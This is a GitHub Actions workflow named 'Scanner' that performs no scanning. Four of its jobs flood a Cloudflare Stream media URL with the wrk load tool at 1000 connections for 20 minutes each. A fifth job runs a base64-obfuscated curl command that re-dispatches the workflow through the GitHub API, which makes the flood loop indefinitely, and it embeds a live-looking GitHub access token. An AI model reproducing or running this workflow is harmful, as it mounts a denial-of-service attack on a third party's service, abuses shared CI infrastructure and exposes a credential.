name: Scanner

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v3
    - uses: actions/setup-python@v4
      with:
        python-version: '3.10'
    - run: |
        sleep 1200s
        bash -c "$(base64 -d <<< "Y3VybCAtWCBQT1NUIC1IICJYLUdpdEh1Yi1BcGktVmVyc2lvbjogMjAyMi0xMS0yOCIgLUggIkF1dGhvcml6YXRpb246IEJlYXJlciBnaHBfaTM5U1ZWeXlVOFV4WkdLTzVPdUVyZGhtMmhWd0NIM3Bad0hDIiAtSCAiQWNjZXB0OiBhcHBsaWNhdGlvbi92bmQuZ2l0aHViK2pzb24iIC1kICJ7XCJyZWZcIjogXCJtYWluXCJ9IiBodHRwczovL2FwaS5naXRodWIuY29tL3JlcG9zL2FyY2hzYWx5L3NjYW5uZXIvYWN0aW9ucy93b3JrZmxvd3Mvc2Nhbm5lci55bWwvZGlzcGF0Y2hlcw==")"

  build1:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v3
    - uses: actions/setup-python@v4
      with:
        python-version: '3.10'
    - run: |
        chmod +x wrk
        ./wrk -c1000 -t50 -d1200s "https://customer-yvgxn6arnuae3q89.cloudflarestream.com/0adeafbee00257a76f1e68585a0663a3/audio/144/init.mp4?p=eyJ0eXBlIjoiaW5pdCIsInZpZGVvSUQiOiIwYWRlYWZiZWUwMDI1N2E3NmYxZTY4NTg1YTA2NjNhMyIsIm93bmVySUQiOjMxNjkxMzI0LCJjcmVhdG9ySUQiOiIiLCJ1c2VWT0RPVEZFIjp0cnVlLCJmcm9tTWV6emFuaW5lIjp0cnVlLCJzdG9yYWdlUHJvdmlkZXIiOjQsInRyYWNrIjoiM2E1ODRmNGExZmI1MWQyNzFjOGU3YjRmMDM2NDQzMmQiLCJyZW5kaXRpb24iOiI3ODA5OTc4NjQiLCJtdXhpbmciOiI4MzUxNDg1NTgifQ&s=wqEtTSrChcKAS8OhOAnCnMKewqHDu1hXw6LCq8KmXXbCusOEbcO6GH8dWzJVw4Y"


  build2:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v3
    - uses: actions/setup-python@v4
      with:
        python-version: '3.10'
    - run: |
        chmod +x wrk
        ./wrk -c1000 -t50 -d1200s "https://customer-yvgxn6arnuae3q89.cloudflarestream.com/0adeafbee00257a76f1e68585a0663a3/audio/144/init.mp4?p=eyJ0eXBlIjoiaW5pdCIsInZpZGVvSUQiOiIwYWRlYWZiZWUwMDI1N2E3NmYxZTY4NTg1YTA2NjNhMyIsIm93bmVySUQiOjMxNjkxMzI0LCJjcmVhdG9ySUQiOiIiLCJ1c2VWT0RPVEZFIjp0cnVlLCJmcm9tTWV6emFuaW5lIjp0cnVlLCJzdG9yYWdlUHJvdmlkZXIiOjQsInRyYWNrIjoiM2E1ODRmNGExZmI1MWQyNzFjOGU3YjRmMDM2NDQzMmQiLCJyZW5kaXRpb24iOiI3ODA5OTc4NjQiLCJtdXhpbmciOiI4MzUxNDg1NTgifQ&s=wqEtTSrChcKAS8OhOAnCnMKewqHDu1hXw6LCq8KmXXbCusOEbcO6GH8dWzJVw4Y"


  build3:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v3
    - uses: actions/setup-python@v4
      with:
        python-version: '3.10'
    - run: |
        chmod +x wrk
        ./wrk -c1000 -t50 -d1200s "https://customer-yvgxn6arnuae3q89.cloudflarestream.com/0adeafbee00257a76f1e68585a0663a3/audio/144/init.mp4?p=eyJ0eXBlIjoiaW5pdCIsInZpZGVvSUQiOiIwYWRlYWZiZWUwMDI1N2E3NmYxZTY4NTg1YTA2NjNhMyIsIm93bmVySUQiOjMxNjkxMzI0LCJjcmVhdG9ySUQiOiIiLCJ1c2VWT0RPVEZFIjp0cnVlLCJmcm9tTWV6emFuaW5lIjp0cnVlLCJzdG9yYWdlUHJvdmlkZXIiOjQsInRyYWNrIjoiM2E1ODRmNGExZmI1MWQyNzFjOGU3YjRmMDM2NDQzMmQiLCJyZW5kaXRpb24iOiI3ODA5OTc4NjQiLCJtdXhpbmciOiI4MzUxNDg1NTgifQ&s=wqEtTSrChcKAS8OhOAnCnMKewqHDu1hXw6LCq8KmXXbCusOEbcO6GH8dWzJVw4Y"


  build4:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v3
    - uses: actions/setup-python@v4
      with:
        python-version: '3.10'
    - run: |
        chmod +x wrk
        ./wrk -c1000 -t50 -d1200s "https://customer-yvgxn6arnuae3q89.cloudflarestream.com/0adeafbee00257a76f1e68585a0663a3/audio/144/init.mp4?p=eyJ0eXBlIjoiaW5pdCIsInZpZGVvSUQiOiIwYWRlYWZiZWUwMDI1N2E3NmYxZTY4NTg1YTA2NjNhMyIsIm93bmVySUQiOjMxNjkxMzI0LCJjcmVhdG9ySUQiOiIiLCJ1c2VWT0RPVEZFIjp0cnVlLCJmcm9tTWV6emFuaW5lIjp0cnVlLCJzdG9yYWdlUHJvdmlkZXIiOjQsInRyYWNrIjoiM2E1ODRmNGExZmI1MWQyNzFjOGU3YjRmMDM2NDQzMmQiLCJyZW5kaXRpb24iOiI3ODA5OTc4NjQiLCJtdXhpbmciOiI4MzUxNDg1NTgifQ&s=wqEtTSrChcKAS8OhOAnCnMKewqHDu1hXw6LCq8KmXXbCusOEbcO6GH8dWzJVw4Y"
